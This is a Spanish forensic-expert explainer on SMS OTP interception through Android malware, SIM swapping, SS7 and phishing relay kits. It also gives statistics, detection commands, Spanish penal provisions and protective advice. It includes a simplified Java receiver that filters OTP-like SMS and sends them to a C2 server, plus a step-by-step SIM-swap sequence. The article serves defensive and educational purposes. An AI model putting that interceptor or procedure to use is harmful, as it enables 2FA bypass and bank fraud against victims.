Ciberataques

SMS Forwarding (Reenvío de SMS)

Técnica de interceptación de mensajes SMS mediante malware, SIM swapping o vulnerabilidades SS7 para capturar códigos OTP bancarios. El FBI contabilizó 17,4 millones de dólares en pérdidas por SIM swap en 2025 y 25,98 millones en 2024, frente a los 72,7 millones de 2022.

17 min de lectura

SMS Forwarding (Reenvío de SMS)

1.055 %. Ese fue el incremento de fraudes por SIM swap documentado en el Reino Unido durante 2024, hasta casi 3.000 casos en un solo año, según Cifas. En España, el INCIBE gestionó 122.223 incidentes de ciberseguridad en 2025, un 26 % más que en 2024; entre quienes acudieron a su Línea de Ayuda 017, el 28 % había recibido algún intento de phishing, vishing o smishing. En muchos de esos fraudes, un código OTP acaba en manos de quien no debería recibirlo.


Definición técnica

SMS Forwarding (reenvío de SMS) engloba el conjunto de técnicas que permiten a un atacante interceptar, redirigir o copiar mensajes SMS destinados a la víctima, especialmente códigos OTP (One-Time Password) utilizados como segundo factor de autenticación (2FA) en banca online, exchanges de criptomonedas y servicios digitales.

Vectores principales de interceptación SMS:

VectorComplejidadAlcance típico
Malware Android (READ_SMS)BajaMasivo
SIM SwappingMediaDirigido
Vulnerabilidad SS7AltaSelectivo
Phishing en tiempo realMediaMasivo
Insider operadoraVariableDirigido

Diferencia clave:

  • Phishing clásico: Engaña al usuario para que entregue credenciales estáticas
  • SMS Forwarding: Intercepta códigos dinámicos OTP en tránsito, permitiendo bypass completo de 2FA

Cómo funciona la interceptación de SMS

Método 1: Malware Android con permisos SMS

El método más común y accesible. El malware solicita permisos READ_SMS, RECEIVE_SMS y SEND_SMS durante la instalación.

  1. Infección: Víctima instala APK malicioso distribuido vía WhatsApp, Telegram o smishing
  2. Permisos: App solicita acceso a SMS con excusa como “verificación de seguridad necesaria”
  3. Copia del mensaje: Con permisos de SMS, la app recibe una copia del broadcast SMS_RECEIVED entrante
  4. Exfiltración: El código OTP se envía al servidor C2 del atacante
  5. Limitación: En Android actual, SMS_RECEIVED_ACTION no es abortable y solo la app SMS predeterminada puede escribir en el proveedor; el malware puede leer y exfiltrar el mensaje, pero no borrarlo ni impedir que la víctima lo vea
  6. Uso inmediato: Atacante introduce el OTP en una sesión bancaria ya iniciada con credenciales robadas
// Ejemplo simplificado: BroadcastReceiver malicioso para SMS
// NOTA: Código con fines educativos/forenses
public class SmsInterceptor extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        Bundle bundle = intent.getExtras();
        SmsMessage[] msgs = Telephony.Sms.Intents
            .getMessagesFromIntent(intent);
        for (SmsMessage sms : msgs) {
            String cuerpo = sms.getMessageBody();
            // Busca patrones OTP: 6 dígitos, "codigo", "code"
            if (cuerpo.matches(".*\\d{6}.*") ||
                cuerpo.toLowerCase().contains("codigo")) {
                // Envia al servidor C2 (solo lectura/exfiltración)
                enviarAlC2(sms.getOriginatingAddress(), cuerpo);
                // NOTA: en Android actual SMS_RECEIVED_ACTION NO es abortable
                // y solo la app SMS por defecto puede borrar del proveedor;
                // la víctima puede seguir viendo el mensaje.
            }
        }
    }
}

Método 2: SIM Swapping

Ataque dirigido donde el delincuente suplanta la identidad de la víctima ante la operadora de telefonía para transferir su número a una nueva tarjeta SIM.

  1. Reconocimiento: Atacante recopila datos personales de la víctima (nombre, DNI, dirección, email) vía redes sociales, filtraciones de datos o ingeniería social
  2. Contacto con operadora: Llama al servicio al cliente de la operadora simulando ser la víctima o acude a tienda física con documentación falsificada
  3. Solicitud de duplicado: Alega pérdida o robo del móvil y solicita nueva SIM con el mismo número
  4. Activación nueva SIM: La operadora activa la nueva SIM y desactiva la original. La víctima pierde cobertura
  5. Recepción de SMS: Todos los SMS destinados al número de la víctima llegan ahora al dispositivo del atacante
  6. Vaciado de cuentas: Atacante inicia sesión en banca online con credenciales previamente obtenidas y confirma con los OTP interceptados
SIM swap: la víctima pierde cobertura

La señal más clara de un SIM swap en curso es la pérdida repentina de cobertura móvil sin explicación. Si tu teléfono muestra “Sin servicio” o “Solo llamadas de emergencia” inesperadamente, contacta inmediatamente con tu operadora y tu banco. Cada minuto cuenta.

Método 3: Vulnerabilidades del protocolo SS7

SS7 (Signalling System 7) es el protocolo de señalización utilizado por operadoras de telecomunicaciones desde los años 80 para enrutar llamadas y SMS entre redes. Contiene vulnerabilidades de diseño que permiten a atacantes con acceso a la red de señalización interceptar SMS.

Ataques SS7 documentados:

AtaqueFunción SS7 abusadaResultado
SendRoutingInfoForSMObtiene la información de encaminamiento para entregar un SMSFacilita ataques posteriores; no redirige el mensaje por sí sola
UpdateLocationActualiza (fraudulentamente) la ubicación del suscriptorPuede registrar al atacante como destino e interceptar comunicaciones entrantes
RegisterSSConfigura servicios suplementarios (p. ej., desvío de llamadas)Activa el desvío de llamadas; la fuente no acredita que desvíe SMS

Accesibilidad: En mayo de 2025, Mobile ID World —una noticia secundaria, no un informe de investigación— recogió que se anunciaba acceso a vulnerabilidades SS7 por unos 5.000 dólares en foros clandestinos. No se ha localizado la fuente primaria de esa oferta.

Limitaciones: Requiere acceso a la red SS7 (normalmente mediante operadoras pequeñas comprometidas o acceso ilícito a equipos de señalización). Es el método más sofisticado y menos frecuente, pero también el más difícil de detectar por la víctima.

Método 4: Phishing en tiempo real (relay kits)

Kits de phishing modernos que actúan como proxy entre la víctima y el sitio legítimo del banco, capturando credenciales y códigos OTP en tiempo real.

  • El usuario recibe SMS phishing con enlace a web falsa del banco
  • Introduce credenciales en el sitio falso
  • El kit de phishing inicia sesión automáticamente en el banco real
  • Banco envía OTP al teléfono del usuario
  • Kit solicita al usuario el OTP recibido
  • Usuario introduce OTP en web falsa; kit lo usa inmediatamente en sesión real
  • Transferencia completada antes de que caduque el código

Estadísticas y datos del impacto

Datos globales 2024-2025

  • FBI / IC3, serie completa — cotejada contra el Internet Crime Report 2025 (PDF), que publica los tres años anteriores en la misma tabla. Las pérdidas por SIM swap en Estados Unidos llevan tres años cayendo:
AñoDenunciasPérdidas (USD)
20222.02672.652.571
20231.07548.798.103
202498225.983.946
202597117.366.758

La caída es del 76 % en pérdidas desde 2022 mientras las denuncias solo bajan a la mitad: el importe medio por caso pasa de unos 35.900 a unos 17.900 dólares. Conviene no leerlo como que el riesgo desaparece —son cifras de denuncias al IC3, solo de Estados Unidos—; los datos no permiten determinar por sí solos la causa del descenso.

  • Cifas (Reino Unido): aumento del 1.055 % en SIM swaps no autorizados en 2024, hasta casi 3.000 casos. La nota de Cifas da el año 2024 y el porcentaje, pero no publica la cifra de partida de 2023.
  • IDCARE (Australia): Incremento del 240% en consultas por SIM swap en 2024, 90% sin intervención de la víctima
  • T-Mobile: en marzo de 2025 se dictó un laudo arbitral de 33 millones de dólares contra T-Mobile por fallos de seguridad relacionados con un SIM swap que vació una cartera cripto (según la nota de los abogados de la parte vencedora, no una sentencia judicial)

Datos España (INCIBE 2025)

  • 122.223 ciberincidentes gestionados (+26% vs 2024)
  • 25.133 incidentes de phishing (más del 50% del fraude online)
  • El 28 % de quienes consultaron a la Línea de Ayuda 017 había recibido algún intento de phishing, vishing o smishing: es el motivo de consulta más frecuente
  • Múltiples alertas INCIBE sobre campañas de smishing suplantando bancos, AEMET y Hacienda

Regulación internacional del SMS OTP

Algunas guías y reguladores impulsan factores de autenticación más resistentes al phishing, pero conviene precisar qué dice cada fuente:

  • India (RBI): el marco sobre mecanismos de autenticación es aplicable desde el 1 de abril de 2026, pero el RBI no exige abandonar el OTP por SMS.
  • NIST (EE. UU.): la guía vigente SP 800-63B-4 —que sustituyó a la de 2017 el 1 de agosto de 2025— clasifica el uso de la red telefónica pública (PSTN) para autenticación fuera de banda como autenticador restringido, no como prohibido.
  • Emiratos Árabes / PSD3: no se ha localizado una norma primaria que imponga los plazos de eliminación de SMS OTP que a veces se atribuyen a los EAU, ni una exclusión del SMS en la Directiva PSD3 en tramitación.
El SMS como segundo factor: qué dicen las fuentes

El SMS es uno de los factores 2FA más expuestos, y la tendencia técnica favorece factores más resistentes al phishing (apps authenticator, llaves FIDO2). Ahora bien, ninguno de los reguladores citados prohíbe hoy de forma general el OTP por SMS: el RBI lo mantiene, NIST lo clasifica como «restringido» y no consta una norma primaria que fije los plazos de eliminación que circulan para otros países.


Análisis forense de interceptación SMS

1. Extracción de evidencia SMS

## Extraer la base de datos SMS (requiere privilegios: root o imagen forense;
## mmssms.db reside en almacenamiento protegido)
adb pull /data/data/com.android.providers.telephony/databases/mmssms.db

## NOTA: `adb backup` NO es una vía general de extracción del proveedor de
## telefonía. Desde Android 12, los datos de apps se excluyen por defecto de
## adb backup (solo con android:debuggable=true, es decir, apps depurables).

## Analizar con SQLite
sqlite3 mmssms.db
> SELECT date, address, body, read, seen FROM sms
  WHERE body LIKE '%codigo%' OR body LIKE '%OTP%'
  ORDER BY date DESC;

2. Detectar malware con permisos SMS

## Listar apps con permisos SMS
adb shell dumpsys package | grep -B 10 "READ_SMS"
adb shell dumpsys package | grep -B 10 "RECEIVE_SMS"

## Verificar BroadcastReceivers registrados para SMS
adb shell dumpsys activity broadcasts | grep "SMS_RECEIVED"

## Comprobar prioridad de receivers (malware usa prioridad alta)
adb shell dumpsys package [paquete_sospechoso] | grep "priority"

3. Detectar SIM swap

Indicadores forenses en el dispositivo:

IndicadorDonde buscarSignificado
Pérdida de red repentinaLogs de radio (logcat -b radio)SIM desactivada por operadora
Cambio de ICCIDgetprop gsm.sim.iccidNueva SIM activada
SMS no recibidosBase de datos SMS (gap temporal)Período de interceptación
Llamadas fallidasCall log databaseRed no disponible

4. Detectar interceptación SS7

La detección de ataques SS7 requiere colaboración con la operadora de telecomunicaciones:

## Solicitar a operadora registros de señalización:
## - UpdateLocation requests para el número afectado
## - SendRoutingInfoForSM desde nodos externos
## - Registros de desvío de llamadas/SMS activos
## - Logs de HLR (Home Location Register)

5. Timeline forense completo

TimestampEventoFuente evidencia
T+0:00Credenciales robadas (phishing/malware)Historial navegador, APK
T+0:05Atacante solicita SIM swap / malware activoRegistros operadora / logs ADB
T+0:15Víctima pierde cobertura (SIM swap)Logs radio dispositivo
T+0:16OTP bancario enviado al númeroRegistros operadora SMS-C
T+0:17OTP recibido por atacanteImposible en dispositivo víctima
T+0:18Login bancario con OTP interceptadoLogs banco (IP, User-Agent)
T+0:20Transferencia ejecutadaExtracto bancario
T+1:00Víctima detecta falta de coberturaDeclaración víctima

Escenario ilustrativo: SIM swap bancario

Escenario ilustrativo

El supuesto siguiente es una construcción didáctica para explicar cómo se correlacionan las evidencias en un SIM swap. No describe un procedimiento judicial ni una pericial concreta; los perfiles, horas, importes y resultados no corresponden a un caso identificable.

Contexto

Una víctima recibe una llamada de alguien que dice ser su operadora, informando de “problemas técnicos con su línea”, y le piden confirmar datos personales. Horas después, su teléfono pierde cobertura.

Secuencia del ataque

  1. Reconocimiento previo: el atacante obtiene credenciales bancarias de la víctima mediante phishing (semanas antes)
  2. Ingeniería social: llamada a la víctima simulando ser la operadora para confirmar datos personales
  3. SIM swap: el atacante solicita un duplicado de SIM ante la operadora con documentación falsificada
  4. Activación: se activa la nueva SIM y la víctima pierde cobertura
  5. Acceso bancario: el atacante inicia sesión en la banca online con las credenciales robadas
  6. Interceptación OTP: el SMS con el código OTP llega ahora al dispositivo del atacante
  7. Transferencias: se ordenan varias transferencias a cuentas mula, fraccionadas para pasar desapercibidas
  8. Detección: la víctima advierte la falta de cobertura y avisa a la operadora y al banco

Evidencia forense que se recuperaría

  • Logs de radio del dispositivo: el momento de la pérdida de señal
  • Base de datos SMS: un gap de mensajes durante el periodo de interceptación
  • Registros de la operadora: la solicitud del duplicado de SIM
  • Registros del banco: login desde IP no habitual, User-Agent distinto y geolocalización inconsistente

Qué documentaría el informe

Un informe pericial reconstruiría la secuencia técnica (pérdida de señal, gap de SMS, correlación temporal entre la interceptación del OTP y la transacción) y serviría de prueba en una reclamación. El resultado de esa reclamación no depende del informe por sí solo.


Delitos tipificados

Código Penal español:

  1. Art. 197.1 CP - Interceptación de comunicaciones

    • “El que para descubrir los secretos o vulnerar la intimidad de otro, sin su consentimiento, se apodere de sus papeles, cartas, mensajes de correo electrónico o cualesquiera otros documentos o efectos personales, intercepte sus telecomunicaciones…”
    • Pena: 1-4 años de prisión + multa 12-24 meses
    • Aplicación directa: La interceptación de SMS OTP constituye interceptación de telecomunicaciones
  2. Art. 197.2 CP - Acceso a datos reservados

    • Apoderarse, utilizar o modificar datos reservados de carácter personal registrados en ficheros o soportes informáticos
    • Pena: 1-4 años de prisión y multa de 12-24 meses (las mismas del art. 197.1; el art. 197.4 la eleva a 3-5 años en supuestos agravados, p. ej. cuando lo comete el responsable del fichero)
  3. Art. 249.1.a CP - Estafa informática

    • Obtención de una transferencia patrimonial no consentida mediante manipulación informática o artificio semejante
    • Modalidad agravada del art. 250.1.5 cuando el valor de la defraudación supera los 50.000 euros, entre otros supuestos
  4. Art. 392 CP - Falsedad en documento oficial

    • Aplicable al SIM swap ejecutado con documento de identidad (DNI) falsificado ante la operadora
    • Pena: 6 meses-3 años de prisión y multa de 6-12 meses

Calificación penal del SIM swap

Las conductas del SIM swapping pueden encajar en varios tipos penales: estafa informática (arts. 249-250 CP), descubrimiento y revelación de secretos (art. 197 CP) y falsedad documental (art. 392 CP) cuando se usa documentación falsificada. La eventual responsabilidad civil de la operadora por una verificación de identidad insuficiente se decide caso por caso; no se cita aquí ninguna resolución concreta con su identificación (órgano, fecha, ROJ o ECLI), por lo que no se afirma una tendencia jurisprudencial consolidada.

Constitución y secreto de comunicaciones

El Art. 18.3 de la Constitución Española garantiza el secreto de las comunicaciones. La interceptación de SMS, por cualquier medio (malware, SIM swap, SS7), vulnera este derecho fundamental. Solo puede ser limitado mediante resolución judicial motivada conforme a los Arts. 588 ter a-i de la LECrim.


Herramientas de protección y detección

Para usuarios

MedidaEfectividadImplementación
Migrar a app authenticator (Google Authenticator, Authy)AltaCambiar 2FA de SMS a app en banca online
PIN de seguridad en operadoraMedia-AltaSolicitar PIN para cambios de SIM
Alertas de consumo en operadoraMediaConfigurar notificaciones de cambios en la línea
No publicar teléfono en redes socialesMediaReducir superficie de ataque para SIM swap
Llaves de seguridad FIDO2/WebAuthnMuy AltaHardware keys (YubiKey, Titan)

Para analistas forenses

  • Cellebrite UFED: Extracción de bases de datos SMS eliminados
  • Oxygen Forensics: Análisis detallado de SMS con metadatos
  • Magnet AXIOM: Correlación temporal de eventos SMS con actividad de red
  • Wireshark: Análisis de tráfico red para detectar exfiltración de SMS por malware
  • SQLite Browser: Análisis manual de mmssms.db

Preguntas frecuentes

¿Es seguro usar SMS como segundo factor de autenticación?

No es el más seguro. El SMS es uno de los métodos de 2FA más expuestos: es vulnerable a SIM swap, malware Android, ataques SS7 y phishing en tiempo real. La guía vigente de NIST (SP 800-63B-4) clasifica el uso de la red telefónica pública para autenticación fuera de banda como autenticador restringido. Siempre que sea posible, migra a una app authenticator (Google Authenticator, Authy) o a llaves FIDO2. Si tu banco solo ofrece SMS, solicita formalmente que implementen alternativas más seguras.

¿Cómo puedo saber si he sufrido un SIM swap?

La señal más inmediata es la pérdida repentina de cobertura móvil. Si tu teléfono muestra “Sin servicio” sin explicación, llama inmediatamente a tu operadora desde otro teléfono. Otras señales incluyen: no recibir SMS esperados, recibir notificaciones de cambio de contraseña que no solicitaste, o detectar movimientos bancarios no autorizados. El tiempo de reacción es crítico: los atacantes suelen actuar con rapidez.

¿Puede un perito informático demostrar que hubo interceptación de SMS?

Sí. Un perito informático forense puede demostrar, mediante análisis forense: (1) presencia de malware con permisos SMS en el dispositivo, (2) gap temporal en la base de datos de SMS coincidente con el fraude, (3) pérdida de señal registrada en logs de radio indicativa de SIM swap, y (4) correlación temporal entre la interceptación del OTP y la transacción fraudulenta. Un informe pericial puede aportar prueba en la reclamación, pero el reembolso depende de si la operación fue autorizada y de las excepciones legales aplicables (fraude o negligencia grave del usuario, entre otras): el informe no lo garantiza por sí solo.

¿Qué responsabilidad tiene la operadora en un caso de SIM swap?

La operadora tiene la obligación de verificar la identidad del solicitante antes de emitir un duplicado de SIM. Si se demuestra que esa verificación fue insuficiente (aceptó documentación falsificada, no pidió comprobaciones adicionales), puede derivarse responsabilidad, que se decide caso por caso según las circunstancias. No se cita aquí ninguna resolución concreta que permita afirmar una línea jurisprudencial consolidada.


Conceptos relacionados


¿Necesitas que una conversación aguante en un juicio?

Una captura se impugna en cuanto la otra parte quiere. La certificación forense preserva el mensaje con su origen, sus metadatos y su cadena de custodia documentada.

Referencias y fuentes

  1. FBI IC3. Internet Crime Report 2024. PDF oficial — verificado: la tabla de denuncias registra «SIM Swap 982» y la de pérdidas «SIM Swap $25.983.946»

    • 982 denuncias SIM swap, pérdidas de 25,98 millones de dólares en 2024
  2. FBI IC3. (2022). “Criminals Increasing SIM Swap Schemes to Steal Millions of Dollars from US Public”. Disponible en: ic3.gov

    • Alerta publicada en 2022 que resume 2021: más de 68 millones de dólares en pérdidas ajustadas (los 72,65 millones corresponden a la serie de 2022 del informe anual, no a esta alerta)
  3. Cifas (Reino Unido) — organización británica de prevención del fraude; publica el recuento de casos registrados en su base nacional. Citarla directamente, no a través de recopilaciones de terceros.

    • Aumento del 1.055 % en SIM swaps no autorizados, hasta casi 3.000 casos en 2024
  4. IDCARE (Australia). “Hijacked Connections: The Reality of Phone Porting and SIM swap scams”. Fuente primaria

    • Incremento del 240% en consultas en 2024 frente a 2023, y 90% sin intervención de la víctima
  5. INCIBE. (2026). “Balance de ciberseguridad 2025”. Disponible en: incibe.es

    • 122.223 ciberincidentes (+26 %), 25.133 phishing, y el 28 % de las consultas al 017 por intentos de phishing, vishing o smishing
  6. INCIBE. (2025). “Campaña de smishing suplantando entidades bancarias”. Disponible en: incibe.es

    • Alertas activas sobre smishing bancario en España
  7. P1 Security. (2025). “SMS-Based Attacks in Mobile Networks”. Disponible en: p1sec.com

    • Análisis técnico de ataques SS7, SIGTRAN y Diameter sobre SMS
  8. Mobile ID World. (mayo de 2025). “Critical SS7 Protocol Vulnerability Being Sold for $5,000…”. Disponible en: mobileidworld.com

    • Noticia secundaria (no un informe de investigación) sobre una oferta anunciada de acceso SS7 por 5.000 dólares
  9. Greenberg Glusker (marzo de 2025). “Greenberg Glusker Secures Landmark $33M Arbitration Award Against T-Mobile for SIM Swap Security Failures”. Nota de la representación procesal — laudo arbitral, no sentencia judicial

  10. NIST. “SP 800-63B-4: Digital Identity Guidelines — Authentication and Authenticator Management” (vigente desde el 1 de agosto de 2025). Disponible en: csrc.nist.gov

    • Clasifica el uso de la PSTN para autenticación fuera de banda como autenticador restringido (sustituye a la guía de 2017)
  11. Código Penal español (BOE): arts. 197 (secretos e intimidad, datos reservados), 249-250 (estafa informática) y 392 (falsedad en documento oficial)

  12. Constitución Española: Art. 18.3 (secreto de las comunicaciones)

  13. LECrim: Arts. 588 ter a-i (intervención de comunicaciones electrónicas)


Última actualización: 6 de septiembre de 2026 Categoría: Ciberataques (CIB-012) Nivel técnico: Intermedio-Avanzado Relevancia: Muy Alta (vector principal de bypass 2FA bancaria 2025-2026)

¿Necesitas un peritaje forense?

Si necesitas ayuda profesional con análisis forense digital, estoy aquí para ayudarte.

Solicitar Consulta Gratuita
Jonathan Izquierdo

Jonathan Izquierdo · Perito Forense

+15 años experiencia · AWS Certified

WhatsApp